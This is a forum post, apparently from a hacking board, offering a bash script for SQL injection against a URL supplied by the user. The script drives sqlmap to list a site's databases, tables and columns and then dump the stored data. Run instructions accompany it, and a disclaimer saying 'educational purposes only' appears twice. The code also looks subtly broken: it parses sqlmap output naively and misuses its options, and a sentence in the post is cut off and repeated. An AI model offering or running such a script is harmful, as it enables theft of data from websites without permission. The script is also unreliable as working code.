balckR0cket
Golden Member
- Joined
- March 4, 2026
- Messages
- 130
- Reaction score
- 1,238
- Points
- 93
- Thread Author
- #1
Here's a detailed script for an SQL injection attack using Kali Linux:
Just save this to a file named
(Note: This script is for educational purposes only and should not be used for illegal activities.)
Code:
#!/bin/bash
url=$1
if [ -z "$url" ]
then
echo "No URL provided. Usage: ./sql_injection.sh <url>"
exit 1
fi
database=$(sqlmap -u "$url" --dbs)
if [ -z "$database" ]
then
echo "No database found."
exit 1
fi
echo "Databases found:"
echo "$database"
read -p "Enter the number of the database you want to attack: " db_num
db_num=$((db_num-1))
database=$(echo "$database" | cut -d' ' -f$((db_num+1)))
tables=$(sqlmap -u "$url" --database="$database" --tables)
if [ -z "$tables" ]
then
echo "No tables found."
exit 1
fi
echo "Tables found in $database:"
echo "$tables"
read -p "Enter the number of the table you want to attack: " table_num
table_num=$((table_num-1))
table=$(echo "$tables" | cut -d' ' -f$((table_num+1)))
columns=$(sqlmap -u "$url" --database="$database" --table="$table" --columns)
if [ -z "$columns" ]
then
echo "No columns found."
exit 1
fi
echo "Columns found in $table of $database:"
echo "$columns"
read -p "Enter the number of the column you want to attack: " column_num
column_num=$((column_num-1))
column=$(echo "$columns" | cut -d' ' -f$((column_num+1)))
data=$(sqlmap -u "$url" --database="$database" --table="$table" --columns="$column" --dump)
echo "Data from $column of $table in $database:"
echo "$data"
exit 0Just save this to a file named
sql_injection.sh , give it execute permissions with chmod +x sql_injection.sh , and run it with a URL as an argument. This script will use sqlmap to find a database, table, and column to attack, then dump the data from that column.
(Note: This script is for educational purposes only and should not be used for illegal activities.)
